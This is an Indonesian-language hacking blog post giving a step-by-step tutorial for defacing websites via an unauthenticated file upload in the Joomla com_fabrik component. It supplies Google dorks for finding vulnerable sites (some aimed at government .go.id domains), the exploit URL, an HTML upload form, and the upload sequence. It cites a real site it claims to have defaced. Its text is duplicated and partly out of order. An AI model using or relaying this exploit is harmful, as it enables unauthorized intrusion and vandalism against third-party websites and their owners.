Tutorial Defece Website Metode Com_Fabrix
Welcome To Our Blog!!
Asalamu'alaikum Wr Wb.
-Htaccess : Bisa Kalian Download <DISINI>
-Script Defece Bisa Kalian Download <DISINI>
Ok Kalo Kalian Udah Siapin Semua Bahan-Bahannya, Langsung Ajah Ke Tutorialnya
Pertama Kyta Dorking Dulu Pake Dork Diatas Ke Mbah Google Kesayangan Kyta
Lalu Pilih Target Nya, Kalo Dah Pilih Targetnya Tinggal Masukin Exploitnya
-Target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Maka tampilan Akan Seperti Ini Kalo Web Nya Vuln (Verawan) Jan ngeres Wahai Otak Vokeperss
Kalo Webnya Vuln Ada Tulisa {"filepath":null,"uri":null}
Lalu Tinggal Masukan link Target Diatas Ke Csrf
Terus Buka Csrf Nya
1. Klik Choose File
2. Pilih Htaccess
3. Klik AhWikWik
4. Reload
5. Pilih Choose File Lagi
6. Pilih Sc Defece Kalian
7. Klik AhWikWik
Nah Selesai!!
Selamat Anda Bisa Defece Poc Com_Fabrix
Cara Melihat Hasil Defece Kalian?
Target.com/NamaScDefecelu.html
Nih Hasil Defece Saya
https://ticketexchange.co.il/.html
Sebenarnya Sih Ini Bisa Tebas Index Juga
Tapi Saya Males Tebas Index
Tapi Kalo Kalian Mau Tebas Indek Tinggal Ganti Ajah Script Defece Kalian Menjadi index.html
WARNING!!
Kalo Anda Kena Masalah Atau Pun Itu Jan Bawa-Bawa Nama Atau Nama INDONESIAN DARKNET V.2, Kalo Anda Tercyduck Luar Tanggung Jawab Kami, Kami Tidk Bertanggung Jawab
OK Makasih Sudah Berkungjung Di Blog Kami
Sampai Jumpa Lagi Di Tutorial Berikutnya!!
Welcome To Our Blog!!
Asalamu'alaikum Wr Wb.
Hai Gassy Betemu Lagi Dengan Saya BrainCOde. Ok Kali Ini Kyta Akan Belajar Tutorial Defece Metode Com_Fabrik
Pertama Kyta Siapkan Bahan-Bahannya Dulu:
-Dork :
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com
inurl:viewTable?cid= site:com
-Exploit : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
-Csrf : <title>BR41N</title>
<br>
<br>
<font size="10">CSRF Com_Fabrik by BR41N</h1><br><br>
<form method="POST" action="http://www.target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>AhWikWik</button>
</form>
</center><br></font>
<font size="4">Dork: inurl:/Com_Fabrik Site:go.id<br>
Note: Warna Merah Ganti Dengan Target Kalian
Save Dengan .html
-Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
<br>
<br>
<font size="10">CSRF Com_Fabrik by BR41N</h1><br><br>
<form method="POST" action="http://www.target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>AhWikWik</button>
</form>
</center><br></font>
<font size="4">Dork: inurl:/Com_Fabrik Site:go.id<br>
Note: Warna Merah Ganti Dengan Target Kalian
Save Dengan .html
-Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
-Htaccess : Bisa Kalian Download <DISINI>
-Script Defece Bisa Kalian Download <DISINI>
Ok Kalo Kalian Udah Siapin Semua Bahan-Bahannya, Langsung Ajah Ke Tutorialnya
Pertama Kyta Dorking Dulu Pake Dork Diatas Ke Mbah Google Kesayangan Kyta
Lalu Pilih Target Nya, Kalo Dah Pilih Targetnya Tinggal Masukin Exploitnya
-Target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Maka tampilan Akan Seperti Ini Kalo Web Nya Vuln (Verawan) Jan ngeres Wahai Otak Vokeperss
Kalo Webnya Vuln Ada Tulisa {"filepath":null,"uri":null}
Lalu Tinggal Masukan link Target Diatas Ke Csrf
Terus Buka Csrf Nya
1. Klik Choose File
2. Pilih Htaccess
3. Klik AhWikWik
4. Reload
5. Pilih Choose File Lagi
6. Pilih Sc Defece Kalian
7. Klik AhWikWik
Nah Selesai!!
Selamat Anda Bisa Defece Poc Com_Fabrix
Cara Melihat Hasil Defece Kalian?
Target.com/NamaScDefecelu.html
Nih Hasil Defece Saya
https://ticketexchange.co.il/.html
Sebenarnya Sih Ini Bisa Tebas Index Juga
Tapi Saya Males Tebas Index
Tapi Kalo Kalian Mau Tebas Indek Tinggal Ganti Ajah Script Defece Kalian Menjadi index.html
WARNING!!
Kalo Anda Kena Masalah Atau Pun Itu Jan Bawa-Bawa Nama Atau Nama INDONESIAN DARKNET V.2, Kalo Anda Tercyduck Luar Tanggung Jawab Kami, Kami Tidk Bertanggung Jawab
OK Makasih Sudah Berkungjung Di Blog Kami
Sampai Jumpa Lagi Di Tutorial Berikutnya!!